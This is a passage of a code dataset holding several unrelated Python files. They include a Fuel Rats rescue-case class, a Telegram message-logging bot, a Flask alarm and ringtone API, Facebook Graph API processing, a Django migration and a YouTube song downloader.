TO UPPER CASE)\n created_at (datetime): time the case was first created\n **( READONLY )**\n updated_at (datetime): last tme the case was modified\n unidentified_rats (list): list of unidentified rats responding to\n rescue **(nicknames)**\n active (bool): marks whether the case is active or not\n quotes (list): list of Quotation objects associated with rescue\n epic (bool): is the case marked as an epic\n title (str): name of operation, if applicable\n first_limpet (UUID): Id of the rat that got the first limpet\n board_index (int): index position on the board, if any.\n mark_for_deletion (dict): the markForDeltion object for the API,\n if any.\n - will default to open and not MD'ed\n lang_id (str): language ID of the client, defaults to english.\n irc_nickname (str): clients IRC nickname, may deffer from their\n commander name.\n rats (list): identified (Rat)s assigned to rescue.\n \"\"\"\n self._platform: Platforms = None\n self.rat_board: 'RatBoard' = board\n self._rats = rats if rats else []\n self._createdAt: datetime = created_at if created_at else datetime.utcnow()\n self._updatedAt: datetime = updated_at if updated_at else datetime.utcnow()\n self._api_id: UUID = uuid\n self._client: str = client\n self._irc_nick: str = irc_nickname\n self._unidentified_rats = unidentified_rats if unidentified_rats else []\n self._system: str = system.upper()\n self._active: bool = active\n self._quotes: list = quotes if quotes else []\n self._epic: List[Epic] = epic if epic is not None else []\n self._codeRed: bool = code_red\n self._outcome: None = None\n self._title: Union[str, None] = title\n self._firstLimpet: UUID = first_limpet\n self._board_index = board_index\n self._mark_for_deletion = mark_for_deletion\n self._board_index = board_index\n self._lang_id = lang_id\n self._status = status\n self._hash = None\n\n def __eq__(self, other) -> bool:\n \"\"\"\n Verify `other` is equal to the elf.\n\n Args:\n other (Rescue): Rescue to compare against\n\n Returns:\n bool: is equivalent\n \"\"\"\n if not isinstance(other, Rescue):\n # instance type check\n return NotImplemented\n else:\n # check equality\n\n conditions = [\n self.uuid == other.uuid,\n self.board_index == other.board_index,\n self.client == other.client,\n self.rats == other.rats,\n self.platform == other.platform,\n self.first_limpet == other.first_limpet,\n self.created_at == other.created_at,\n self.updated_at == other.updated_at,\n self.system == other.system,\n self.unidentified_rats == other.unidentified_rats,\n self.active == other.active,\n self.code_red == other.code_red,\n self.outcome == other.outcome,\n self.title == other.title,\n self.first_limpet == other.first_limpet,\n self.marked_for_deletion == other.marked_for_deletion,\n self.lang_id == other.lang_id,\n self.rats == other.rats,\n self.irc_nickname == other.irc_nickname,\n ]\n\n return all(conditions)\n\n def __hash__(self):\n\n if self._hash is None:\n attributes = (\n self.uuid,\n self.board_index,\n self.client,\n self.platform,\n self.first_limpet,\n self.created_at,\n self.updated_at,\n self.system,\n self.active,\n self.code_red,\n self.outcome,\n self.title,\n self.first_limpet,\n self.lang_id,\n self.irc_nickname,\n )\n\n self._hash = reduce(xor, map(hash, attributes))\n return self._hash\n\n @property\n def status(self) -> Status:\n \"\"\"\n Status enum for the rescue\n\n Returns:\n Status\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, value: status):\n \"\"\"\n Set the value of the status enum\n\n Args:\n value (Status): new status enum\n\n Raises:\n TypeError: invalid `value` type\n \"\"\"\n if isinstance(value, Status):\n self._status = value\n else:\n raise TypeError\n\n @property\n def irc_nickname(self) -> str:\n \"\"\"\n The client's irc nickname\n\n Returns:\n str : nickname\n \"\"\"\n return self._irc_nick\n\n @irc_nickname.setter\n def irc_nickname(self, value: str) -> None:\n \"\"\"\n Sets the client's irc nickname\n\n Args:\n value (str): new nickname\n\n Raises:\n TypeError : value was not a string.\n \"\"\"\n if isinstance(value, str):\n self._irc_nick = value\n else:\n raise TypeError\n\n @property\n def lang_id(self) -> str:\n \"\"\"\n The language ID the client reported upon entering\n Returns:\n str: clients language ID\n \"\"\"\n return self._lang_id\n\n @lang_id.setter\n def lang_id(self, value) -> None:\n \"\"\"\n Sets the client's language\n\n Args:\n value (str): new lagnuage code\n \"\"\"\n if isinstance(value, str):\n self._lang_id = value\n else:\n raise TypeError\n\n @property\n def platform(self):\n \"\"\"The Rescue's platform\"\"\"\n return self._platform\n\n @platform.setter\n def platform(self, value) -> None:\n \"\"\"\n Set the client's platform\n\n Args:\n value (Platforms): new platform\n \"\"\"\n if isinstance(value, Platforms):\n self._platform = value\n else:\n raise TypeError(f\"expected a Platforms, got type {type(value)}\")\n\n @property\n def first_limpet(self) -> UUID:\n \"\"\"\n The ratID of the rat that got the first limpet\n\n Returns:\n str : ratid\n \"\"\"\n return self._firstLimpet\n\n @first_limpet.setter\n def first_limpet(self, value: UUID) -> None:\n \"\"\"\n Set the value of the first limpet rat\n\n If the value is not a UUID, this method will attempt to coerce it into one.\n\n Args:\n value (UUID): rat id of the first-limpet rat.\n\n Returns:\n None\n\n Raises:\n ValueError: The value was not a UUID and could not be parsed into a valid one.\n \"\"\"\n if isinstance(value, UUID):\n self._firstLimpet = value\n else:\n # the value wasn't a uuid, but lets try and coerce it into one.\n try:\n # try parse\n guid = UUID(value)\n except (ValueError, AttributeError):\n # the attempt failed\n raise TypeError(f\"expected UUID, got type {type(value)}\")\n else:\n # the attempt succeeded, lets assign it.\n self._firstLimpet = guid\n\n @property\n def board_index(self) -> int or None:\n \"\"\"\n The position on the rescue board this rescue holds, if any.\n\n Returns:\n int: if the board is attached to a case, otherwise None\n \"\"\"\n return self._board_index\n\n @board_index.setter\n def board_index(self, value: int or None) -> None:\n \"\"\"\n Sets the Rescue's board index\n\n Set to None if the rescue is not attached to the board.\n\n Args:\n value (int or None): index position\n\n Returns:\n None\n \"\"\"\n # negative board indexes should not be possible, right?\n if isinstance(value, int) or value is None:\n if value is None or value >= 0:\n self._board_index = value\n else:\n raise ValueError(\"Value must be greater than or equal to zero,\"\n \" or None.\")\n else:\n raise TypeError(f\"expected int or None, got {type(value)}\")\n\n @property\n def uuid(self) -> UUID:\n \"\"\"\n The API Id of the rescue.\n\n Returns: API id\n\n \"\"\"\n\n return self._api_id\n\n @uuid.setter\n def uuid(self, value: UUID) -> None:\n \"\"\"\n Sets the API uuid associated with the Rescue\n\n Args:\n value (UUID): The API ID\n\n Returns:\n None\n \"\"\"\n if isinstance(value, UUID):\n self._api_id = value\n else:\n raise ValueError(f\"expected UUID, got type {type(value)}\")\n\n @property\n def client(self) -> str:\n \"\"\"\n The client associated with the rescue\n\n Returns:\n (str) the client\n\n \"\"\"\n return self._client\n\n @client.setter\n def client(self, value: str) -> None:\n \"\"\"\n Sets the client's Commander Name associated with the rescue\n\n Args:\n value (str): Commander name of the client\n\n Returns:\n None\n \"\"\"\n self._client = value\n\n @property\n def created_at(self) -> datetime:\n \"\"\"\n Case creation time.\n\n Notes\n this property is **READONLY**.\n\n\n It can only be set during Rescue object creation\n\n Returns:\n datetime: creation date\n \"\"\"\n return self._createdAt\n\n @property\n def system(self) -> Optional[str]:\n \"\"\"\n The clients system name\n\n Returns:\n str: the clients system name\n \"\"\"\n return self._system\n\n @system.setter\n def system(self, value: Optional[str]):\n \"\"\"\n Sets the system property to the upper case of `value`\n\n Raises:\n AttributeError: if `value` is not a string\n\n Args:\n value (str): string to set `self.system` to\n\n Returns:\n None\n\n Notes:\n this method will cast `value` to upper case, as to comply with\n Fuelrats Api v2.1\n \"\"\"\n\n assert value is None or isinstance(value, str)\n\n if value is None:\n # System must be nullable, so we specifically check for it\n self._system = value\n # for API v2.1 compatibility reasons we cast to upper case\n self._system = value.upper()\n\n @property\n def active(self) -> bool:\n \"\"\"\n marker indicating whether a case is active or not. this has no direct\n effect on bot functionality,rather its primary function is case\n management.\n\n Returns:\n bool: Active state\n \"\"\"\n return False if self.status == Status.INACTIVE else True\n\n @active.setter\n def active(self, value: bool) -> None:\n \"\"\"\n setter for `Rescue.active`\n\n Args:\n value (bool): state to set `active` to.\n\n Returns:\n None\n \"\"\"\n if isinstance(value, bool):\n if value:\n self.status = Status.OPEN\n else:\n self.status = Status.INACTIVE\n else:\n raise ValueError(f\"expected bool, got type {type(value)}\")\n\n @property\n def quotes(self) -> list:\n \"\"\"\n Contains all the quotes associated with this Rescue object.\n\n Elements of the list are Quotation objects\n\n Returns:\n list: list of Quotation objects\n \"\"\"\n return self._quotes\n\n @quotes.setter\n def quotes(self, value) -> None:\n \"\"\"\n Sets the value of the quotes property to whatever `value` is.\n\n This should not be set directly outside of case init, rather via\n `add_quote`\n\n Args:\n value (list): list of Quotation objects\n\n Returns:\n None\n \"\"\"\n if isinstance(value, list):\n self._quotes = value\n else:\n raise ValueError(f\"expected type list, got {type(value)}\")\n\n def add_quote(self, message: str, author: str or None = None) -> None:\n \"\"\"\n Helper method, adds a `Quotation` object to the list.\n\n Use this method to add a Quotation to the Rescue\n\n Args:\n message (str): Message to quote\n author (str): IRC nickname of who is being quoted, if any.\n Otherwise Defaults to Mecha.\n\n Returns:\n None\n \"\"\"\n if author:\n # set the author of the quote\n self.quotes.append(Quotation(author=author, message=message))\n else:\n # otherwise use default\n self.quotes.append(Quotation(message=message))\n\n @property\n def updated_at(self):\n \"\"\"\n Last time the rescue object was changed\n\n Returns:\n datetime\n \"\"\"\n\n return self._updatedAt\n\n @updated_at.setter\n def updated_at(self, value):\n \"\"\"\n Updates `Rescue.updated_at` property\n\n Args:\n value (datetime): new last modified datetime\n\n Raises:\n TypeError: invalid `value` type.\n ValueError: `value` is earlier than creation date.\n\n Returns:\n\n \"\"\"\n if not isinstance(value, datetime):\n raise TypeError(f\"Expected datetime, got {type(value)}\")\n elif value < self.created_at:\n raise ValueError(f\"{value} is older than the cases creation date!\")\n else:\n self._updatedAt = value\n\n @property\n def unidentified_rats(self) -> List[str]:\n \"\"\"\n List of unidentified rats by their IRC nicknames\n\n Returns:\n list: unidentified rats by IRC nickname\n \"\"\"\n return self._unidentified_rats\n\n @unidentified_rats.setter\n def unidentified_rats(self, value) -> None:\n \"\"\"\n Sets the value of unidentified_rats\n\n Args:\n value (list): list of strings\n\n Raises:\n ValueError: value contained illegal types\n TypeError: value was of an illegal type\n\n \"\"\"\n if isinstance(value, list):\n for name in value:\n if isinstance(name, str):\n self._unidentified_rats.append(name)\n else:\n raise ValueError(f\"Element '{name}' expected to be of type str\"\n f\"str, got {type(name)}\")\n else:\n raise TypeError(f\"expected type str, got {type(value)}\")\n\n @property\n def open(self) -> bool:\n \"\"\"\n Helper method for determining if a case is considered open or not\n\n Returns:\n bool: is case open?\n\n \"\"\"\n return self.status is not Status.CLOSED\n\n @open.setter\n def open(self, value: bool) -> None:\n \"\"\"\n helper method for setting the Rescue's open status\n\n Args:\n value (bool): value to set\n\n Returns:\n None\n\n Raises:\n TypeError: value was not a boolean\n \"\"\"\n if isinstance(value, bool):\n if value:\n self.status = Status.OPEN\n else:\n self.status = Status.CLOSED\n else:\n raise TypeError(f\"expected type bool, got {type(value)}\")\n\n @property\n def epic(self) -> List[Epic]:\n \"\"\"\n Epic status of the rescue.\n\n Returns:\n Epic\n\n Notes:\n This property is **READ ONLY** (for now)\n \"\"\"\n return self._epic\n\n @property\n def code_red(self) -> bool:\n \"\"\"\n Code Red status for the Rescue\n\n Returns:\n bool\n \"\"\"\n return self._codeRed\n\n @code_red.setter\n def code_red(self, value: bool):\n if isinstance(value, bool):\n self._codeRed = value\n else:\n raise TypeError(f\"expected type bool, got {type(value)}\")\n\n @property\n def outcome(self) -> None:\n \"\"\"\n Success status for Rescue.\n\n Returns:\n bool\n \"\"\"\n return self._outcome\n\n @property\n def title(self) -> str or None:\n \"\"\"\n The rescues operation title, if any\n\n Returns:\n str: operation name if set\n\n None: no name set.\n \"\"\"\n return self._title\n\n @title.setter\n def title(self, value: str or None) -> None:\n \"\"\"\n Set the operations title.\n\n Args:\n value (str or None): Operation name.\n\n Returns:\n None\n\n Raises:\n TypeError: bad value type\n \"\"\"\n if value is None or isinstance(value, str):\n self._title = value\n else:\n raise TypeError(f\"expected type None or str, got {type(value)}\")\n\n @property\n def marked_for_deletion(self) -> MarkForDeletion:\n \"\"\"\n Mark for deletion object as used by the API\n\n Returns:\n dict\n \"\"\"\n return self._mark_for_deletion\n\n @marked_for_deletion.setter\n def marked_for_deletion(self, value) -> None:\n \"\"\"\n Sets the Md object\n\n Args:\n value (MarkForDeletion): value to set the MD object to.\n\n Returns:\n None\n\n Raises:\n TypeError: bad value type\n \"\"\"\n if isinstance(value, MarkForDeletion):\n self._mark_for_deletion = value\n else:\n raise TypeError(f\"got {type(value)} expected MarkForDeletion object\")\n\n @property\n def rats(self) -> List[Rat]:\n \"\"\"\n Identified rats assigned to rescue\n\n Returns:\n list: identified rats by UUID\n \"\"\"\n return self._rats\n\n @rats.setter\n def rats(self, value):\n \"\"\"\n Sets the rats property directly, it is recommended to use the helper\n methods to add/remove rats.\n\n Args:\n value (list): new value for `rats`\n\n Returns:\n\n \"\"\"\n if isinstance(value, list):\n self._rats = value\n\n else:\n raise TypeError(f\"expected type list got {type(value)}\")\n\n async def add_rat(self,\n name: str = None,\n guid: UUID or str = None,\n rat: Rat = None) -> Optional[Rat]:\n \"\"\"\n Adds a rat to the rescue. This method should be run inside a `try` block, as failures will\n be raised as exceptions.\n\n this method will attempt to coerce `guid:str` into a UUID and may fail in\n spectacular fashion\n\n Args:\n rat (Rat): Existing Rat object to assign.\n name (str): name of a rat to add\n guid (UUID or str): api uuid of the rat, used if the rat is not found in the cache\n - if this is a string it will be type coerced into a UUID\n Returns:\n Rat: the added rat object\n\n Raises:\n ValueError: guid was of type `str` and could not be coerced.\n ValueError: Attempted to assign a Rat that does not have a UUID.\n\n Examples:\n ```python\n\n ```\n \"\"\"\n assigned_rat: Optional[Rat] = None\n\n if isinstance(rat, Rat):\n # we already have a rat object, lets verify it has an ID and assign it.\n if rat.uuid is not None:\n self.rats.append(rat)\n assigned_rat = rat\n else:\n raise ValueError(\"Assigned rat does not have a known API ID\")\n\n if isinstance(name, str):\n # lets check if we already have this rat in the cache (platform, any)\n found = (await RatCache().get_rat_by_name(name, self.platform),\n await RatCache().get_rat_by_name(name))\n if found[0]:\n self.rats.append(found[0])\n assigned_rat = found[0]\n elif found[1]:\n # a generic match (not platform specific) was found\n # TODO throw a warning so the invoking method can handle this condition\n log.warning(\"A match was found, but it was not the right platform!\")\n self.rats.append(found[1])\n assigned_rat = found[1]\n\n else:\n # lets make a new Rat!\n # if self.rat_board: # PRAGMA: NOCOVER\n # pass # TODO fetch rat from API\n # TODO: fetch rats from API handler, use that data to make a new Rat instance\n\n rat = Rat(name=name, uuid=guid)\n self.rats.append(rat)\n assigned_rat = rat\n\n elif guid is not None:\n if isinstance(guid, str):\n # attempt to coerce into a UUID\n parsed_guid = UUID(guid)\n elif isinstance(guid, UUID):\n parsed_guid = guid\n else:\n raise ValueError(f\"Expected str/UUID, got {type(guid)}\")\n\n # lets check if we already have this rat in the cache\n found = await RatCache().get_rat_by_uuid(parsed_guid)\n if found:\n self.rats.append(found)\n assigned_rat = found\n else:\n pass # TODO: placeholder for fetching rats from the API handler\n\n return assigned_rat\n\n def mark_delete(self, reporter: str, reason: str) -> None:\n \"\"\"\n Marks a rescue for deletion\n\n Args:\n reporter (str): person marking rescue as deleted\n reason (str): reason for the rescue being marked as deleted.\n\n Raises:\n TypeError: invalid params\n \"\"\"\n # type enforcement\n if not isinstance(reporter, str) or not isinstance(reason, str):\n raise TypeError(f\"reporter and/or reason of invalid type. got {type(reporter)},\"\n f\"{type(reason)}\")\n\n log.debug(f\"marking rescue @{self.uuid} for deletion. reporter is {reporter} and \"\n f\"their reason is '{reason}'.\")\n if reason == \"\":\n raise ValueError(\"Reason required.\")\n self.marked_for_deletion.reporter = reporter\n self.marked_for_deletion.reason = reason\n self.marked_for_deletion.marked = True\n\n def unmark_delete(self) -> None:\n \"\"\"\n helper method for unmarking a rescue for deletion. resets the Md object\n \"\"\"\n\n self.marked_for_deletion.marked = False\n self.marked_for_deletion.reason = None\n self.marked_for_deletion.reporter = None\n\n @contextmanager\n def change(self):\n \"\"\"\n Convenience method for making safe attribute changes.\n\n FIXME: currently just ensures rescue.updated_at is updated.\n\n TODO: replace with Board context manager once its implemented\n\n TODO: replace current context manager with a dummy once the Board\n context manager is a thing.\n\n TODO: implement API integration (probably in the board Contextmanager\n\n Returns:\n contextManager\n\n\n Examples:\n ```\n\n with rescue.change():\n rescue.client = foo\n\n ```\n \"\"\"\n yield\n self.updated_at = datetime.utcnow()\n\n # TODO: to/from json\n # TODO: track changes\n # TODO: helper method for adding / editing quotes\n","sub_path":"Modules/rat_rescue.py","file_name":"rat_rescue.py","file_ext":"py","file_size_in_byte":25803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21821196","text":"__author__ = '@DingChen-Tsai'\n\nimport sys\nimport time\nimport pprint\nimport telepot\nimport datetime\nfrom configparser import SafeConfigParser\n\n#定義telegram各項參數\ndef handle(msg):\n\t#pprint.pprint(msg)\n\tcontent_type, chat_type, chat_id = telepot.glance(msg)\n\tchat_id = msg['chat']['id']\n\tmessage_id = msg['message_id']\n\tuser_id = msg['from']['id']\n\ttry:\n\t\tusername = msg['from']['first_name'] +' '+ msg['from']['last_name']\n\texcept:\n\t\tusername = msg['from']['first_name']\n\n\t#接收文字訊息回應\n\tif content_type == 'text':\n\t\tsay = msg['text']\n\t\tcommand = msg['text'].lower()\n\t\tcontent = '%s(%d)說:%s' % (username,user_id,say)\n\t\tif command.startswith(\"/start\"):\n\t\t\tbot.sendMessage(chat_id, 'RRRRR')\n\t#接收圖片顯示圖片id\n\telif content_type == 'photo':\n\t\t\t#取出原始尺寸圖片file_id\n\t\t\ta = msg['photo']\n\t\t\tmax = 0\n\t\t\tfor i in range(1,len(a)):\n\t\t\t\tif a[i]['width'] > a[max]['width']:\n\t\t\t\t\tmax = i\n\t\t\tmax_file_id = a[max]['file_id']\n\t\t\tcontent = '%s(%d)傳送圖片:\\n%s' % (username,user_id,max_file_id)\n\t#接收貼圖\n\telif content_type == 'sticker':\n\t\tcontent = '%s(%d)傳送貼圖:\\n%s' % (username,user_id,msg['sticker']['file_id'])\n\t#接收檔案\n\telif content_type == 'document':\n\t\tcontent = '%s(%d)傳送檔案:\\n%s\\n%s' % (username,user_id,msg['document']['file_name'],msg['document']['file_id'])\n\t#接收位置\n\telif content_type == 'location':\n\t\tcontent = '%s(%d)傳送位置:\\n%f,%f' % (username,user_id,msg['location']['latitude'],msg['location']['longitude'])\n\t#接收聲音\n\telif content_type == 'voice':\n\t\tcontent = '%s(%d)傳送聲音:\\n%s' % (username,user_id,msg['voice']['file_id'])\n\n\t#log整理\n\tlog = '[%s] %s\\n' % (time.strftime(\"%Y-%m-%d %I:%M:%S\"),content)\n\t#寫入txt\n\twith open('log.txt', 'a') as f:\n\t\tf.write(log)\n\t\tf.close()\n\tprint (log)\n\n#登入資訊\nparser = SafeConfigParser()\nparser.read('apitoken.txt')\nowner = parser.get('apitoken','owner')\nbot_apitoken = parser.get('apitoken', 'token')\nbot = telepot.Bot(bot_apitoken)\nbot.sendMessage(int(owner),'運轉中!')\nbot.message_loop(handle)\nprint ('監聽中 ...')\n\nwhile 1:\n\ttime.sleep(10)\n","sub_path":"python3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"533090528","text":"import os\nfrom datetime import datetime\nfrom flask import request, current_app, jsonify\nfrom werkzeug.datastructures import FileStorage\nfrom app import db\nfrom . import alarm\nfrom app.models import Alarm, Ring\nimport shutil\nfrom .kit import split_ring, set_alarm\nfrom concurrent.futures import ThreadPoolExecutor\n\n@alarm.route('/newAlarm', methods=['POST'])\ndef new_alarm():\n user_id = 1\n ring_id = 1\n username = 'admin'\n name = request.form.get('name')\n alarm_time = request.form.get('time')\n loop = request.form.get('loop', False)\n loop = True if loop =='True' else False\n weeks = request.form.get('weeks', None)\n\n if name and alarm_time:\n a = Alarm()\n a.name = name\n a.alarm_time = alarm_time\n a.loop = loop\n a.weeks = weeks\n a.user_id = user_id\n a.ring_id = ring_id\n db.session.add(a)\n try:\n db.session.commit()\n\n path = os.path.join(current_app.config['RING_UPLOAD_DIR'], str(user_id) + '-' + username)\n if not os.path.exists(path):\n os.makedirs(path)\n ring_path = Ring.query.filter_by(id=ring_id).first().split_path\n set_alarm(path, ring_id, ring_path, alarm_time, loop, weeks)\n return jsonify({'code':1})\n except Exception as e:\n print(e)\n db.session.rollback()\n return jsonify({'code': 0})\n return jsonify({'code': 0})\n\n@alarm.route('/uploadRing', methods=['POST'])\ndef upload_ring():\n user_id = 1\n username = 'admin'\n ring = request.files.get('ring')\n filename = os.path.splitext(ring.filename)\n if ring and filename[-1] == '.mp3':\n\n path = os.path.join(current_app.config['RING_UPLOAD_DIR'], str(user_id)+username)\n if not os.path.exists(path):\n os.makedirs(path)\n full_path = os.path.join(path, ring.filename)\n split_path = os.path.join(full_path, filename[0] + '_' + str(current_app.config['SPLIT_RING_TIME'])\n + 's' + filename[-1])\n if not os.path.exists(full_path):\n with open(full_path, 'wb') as f:\n FileStorage.save(ring, f)\n else:\n return jsonify({'code':0, 'msg':'the file has existed'})\n with ThreadPoolExecutor(max_workers=20) as executor:\n executor.submit(split_ring, (full_path, split_path))\n\n r = Ring()\n r.full_name = filename[0]\n r.full_path = full_path\n r.split_path = split_path\n r.user_id = user_id\n r.create_time = datetime.now()\n db.session.add(r)\n try:\n db.session.commit()\n return jsonify({'code':1})\n except Exception as e:\n print(e)\n db.session.rollback()\n return jsonify({'code':1, 'msg':'write to datebase failed'})\n return jsonify({'code':0})\n\n\n\n\n\n\n\n","sub_path":"app/alarm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284621722","text":"import text_analysis_freebase\nfrom datetime import datetime, timedelta\nimport re\nfrom recommender.models import User, Friend\n# from pymongo import MongoClient\n# from sentiment import analysis\nfrom facebook import GraphAPI\nimport youtubeAPI\n# from langid import classify\nfrom rating_calculation import *\n\n\ndef get_user_history(user):\n my_movie_actions = []\n token = user['token']\n time_window = datetime.now() - timedelta(days=60)\n graph = GraphAPI(token)\n limit = 'limit(100)'\n links_fields = 'fields(link, id, name, created_time)'\n time_mod = 'since({0})'.format(str(time_window))\n links = 'links.{0}.{1}.{2}'.format(time_mod, links_fields, limit)\n video_sub = 'watches'\n video_fields = 'fields(id, data, publish_time)'\n video = 'video.{0}.{1}'.format(video_sub, video_fields)\n fields = {'fields': 'name,{0},{1}'.format(links, video)}\n my_wall = graph.get_object('me', **fields)\n user_movie_genres = user['movie_genres']\n\n my_links = (my_wall['links']['data'] if 'links' in my_wall else {})\n my_movie_actions = (my_wall['video.watches']['data']\n if 'video.watches' in my_wall else {})\n\n for video in my_movie_actions:\n entity = {}\n video_data = video['data']\n if 'movie' in video_data:\n title = video_data['movie']['title']\n post_id = video['id']\n entity = text_analysis_freebase.search(title, \"movie\")\n if entity:\n genres = entity['genres']\n user_movie_genres = user['movie_genres']\n for genre in genres:\n user_movie_genres[genre.lower()] = (user_movie_genres.get(\n genre, 1)\n + 1)\n if title:\n movie_categories = {}\n movie_categories['like_name'] = entity['name']\n movie_categories['fb_id'] = post_id\n movie_categories['genres'] = entity['genres']\n user['movie_categories'].append(movie_categories)\n\n process_links_history(my_links, user)\n process_videos_history(my_movie_actions, user)\n total_weight_of_user_movie_genres = sum(user['movie_genres'].values())\n total_weight_of_user_music_genres = sum(user['music_genres'].values())\n\n user['total_movie_score'] = total_weight_of_user_movie_genres\n user['total_music_score'] = total_weight_of_user_music_genres\n user['movie_likes_score'] = get_score_sum(user['movie_categories'],\n user['movie_genres'])\n user['music_likes_score'] = get_score_sum(user['music_categories'],\n user['music_genres'])\n\n\ndef process_videos_history(my_movie_actions, user):\n for video in my_movie_actions:\n entity = {}\n video_data = video['data']\n user_movie_genres = user['movie_genres']\n if 'movie' in video_data:\n title = video_data['movie']['title']\n post_id = video['id']\n entity = text_analysis_freebase.search(title, \"movie\")\n entity_genres = (entity['genres'] if 'genres' in entity else None)\n for genre in entity_genres:\n user_movie_genres[genre] = user_movie_genres.get(genre, 1) + 1\n if title:\n movie_categories = {}\n movie_categories['like_name'] = entity['name']\n movie_categories['fb_id'] = post_id\n movie_categories['genres'] = entity_genres\n user['movie_categories'].append(movie_categories)\n\n\ndef process_links_history(my_links, user):\n for post in my_links:\n tids = []\n url = \"\"\n\n title = (post['name'] if 'name' in post else '')\n post_link = post['link']\n post_id = post['id']\n\n if any(element in post_link for element in ['youtube', 'youtu.be']):\n tids, url = youtubeAPI.getEntity(post_link, title)\n entity = {}\n\n for tid in tids:\n entity = text_analysis_freebase.link_search(tid, title)\n if entity:\n break\n if entity and entity['type'] == 'movie' and entity['genres']:\n entity_genres = entity['genres']\n user_movie_genres = user['movie_genres']\n for genre in entity['genres']:\n user_movie_genres[genre] = user_movie_genres.get(genre, 1) + 1\n movie_category = {}\n movie_category['like_name'] = entity['name']\n movie_category['fb_id'] = post_id\n movie_category['genres'] = entity['genres']\n user['movie_categories'].append(movie_category)\n elif entity and entity['type'] == 'music' and entity['genres']:\n entity_genres = entity['genres']\n user_music_genres = user['movie_genres']\n for genre in entity_genres:\n user_movie_genres[genre] = user_music_genres.get(genre, 1) + 1\n music_category = {}\n music_category['like_name'] = entity['name']\n music_category['fb_id'] = post_id\n music_category['genres'] = entity['genres']\n user['music_categories'].append(music_category)\n\n\ndef filter_likes(friend, token):\n friend_movie_likes = []\n friend_music_likes = []\n graph = GraphAPI(token)\n try:\n music_fields = 'id,name,category,genre'\n limit = 500\n friend_likes = graph.get_object(friend['id'] + '/music',\n fields=music_fields, limit=limit)\n except (Exception):\n friend_likes = {'data': []}\n friend_music_likes = []\n\n for like in friend_likes['data']:\n try:\n like['name'].encode('ascii')\n except(UnicodeDecodeError, UnicodeEncodeError):\n continue\n if 'Musician/band' in like['category']:\n like_object = {}\n like_object['id'] = like['id']\n like_object['name'] = like['name'].encode('utf-8')\n like_object['category'] = like['category']\n friend_music_likes.append(like_object)\n try:\n music_fields = 'id,name,genre,category'\n limit = 500\n friend_likes = graph.get_object(friend['id'] + '/movies',\n fields=music_fields, limit=limit)\n except:\n friend_likes = {'data': []}\n friend_movie_likes = []\n for like in friend_likes['data']:\n try:\n like['name'].encode('ascii')\n except (UnicodeDecodeError, UnicodeEncodeError):\n continue\n if 'Movie' in like['category'] and 'character' not in like['category']:\n like_object = {}\n like_object['id'] = like['id']\n like_object['name'] = like['name'].encode('utf-8')\n like_object['category'] = like['category']\n friend_movie_likes.append(like_object)\n return friend_movie_likes, friend_music_likes\n","sub_path":"common/entity_extraction/graph_api_processing.py","file_name":"graph_api_processing.py","file_ext":"py","file_size_in_byte":6987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"99336560","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('administration', '0009_auto_20150608_1133'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='receipt',\n name='entry_starts_at',\n field=models.CharField(help_text='The first entry is has this number.', max_length=16, verbose_name='Entry starts at'),\n preserve_default=True,\n ),\n ]\n","sub_path":"administration/migrations/0010_auto_20150608_2045.py","file_name":"0010_auto_20150608_2045.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"553840081","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\nfrom kivy.core.audio import SoundLoader\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time, os\n\nimport songBox_list as sbl\nimport songBox_singerlist as sbs\n\nbaseDir = os.getcwd()#os.path.abspath('py_song')#workging 폴더\nmp3Dir = os.path.join(baseDir, \"songBox_list\")#노래 폴더\nfontDir = os.path.join(baseDir, \"songBox_font\")#글자 폴더\nimgDir = os.path.join(baseDir, \"songBox_img\")#그림 폴더\ndataDir = os.path.join(mp3Dir, \"0_file_data\")#데이터목록 csv 저장폴더\nuserListDir = os.path.join(mp3Dir, \"1_dir_userlist\")#userlist 폴더\nsingerListDir = os.path.join(mp3Dir, \"2_dir_singerlist\")#userlist 폴더\nttsDir = os.path.join(mp3Dir, \"3_tts\")#tts 폴더\nignoreFile = ['ffmpeg','youtube-dl.exe','.DS_Store','list_data','0_file_data','1_dir_userlist','2_dir_singerlist','3_tts']#dir 안에 존재해야만하는 파일 but mp3 아닌 파일 목록\n\n#===============get chrome driver===============================================\ndef get_driver():\n try:\n driver = webdriver.Chrome(f'{baseDir}\\\\chromedriver')\n except:\n driver = webdriver.Chrome(f'{baseDir}\\\\chromedriver.exe')\n return driver\n\n#===============song select 할 때 사용 - 검색하고 list 폴더 안에 mp3 저장 ==============\n#===============class UpperMenu>def songBox_pressed(팝업에서 add버튼 클릭시, thread)=\ndef change_Song(song, singer):\n #song = input(\"song?\")\n os.chdir(f'{baseDir}')\n myDriver = get_driver() # os 고려하기\n myDriver.get(f'https://www.youtube.com/results?search_query={song} {singer}')\n #myDriver.find_element_by_id('img').click()\n url = myDriver.find_element_by_xpath('//*[@id=\"video-title\"]')\n urlAddress=url.get_attribute('href')\n urlSplit=list(urlAddress.split(\"=\"))\n songAddress=urlSplit[1]\n\n shareAddress = f'https://youtu.be/{songAddress}'\n shareAddressTwo = f'https://www.youtube.com/watch?v={songAddress}'\n print(urlAddress,songAddress, shareAddress)\n #youtube-dl -x --audio-format mp3 <동영상 주소> or <재생목록 주소>\n #youtube-dl -x --audio-format mp3 https://youtu.be/75fEhQlc9h4\n\n #===============다운로드 시도==================================================\n try:\n os.chdir(f'{mp3Dir}')\n beforeDown = os.listdir(f'{mp3Dir}')\n res = os.system(f'youtube-dl -x --audio-format wav {shareAddress}')\n\n print(f\"1 try:{res}\")\n time.sleep(3)\n if res != 0:\n 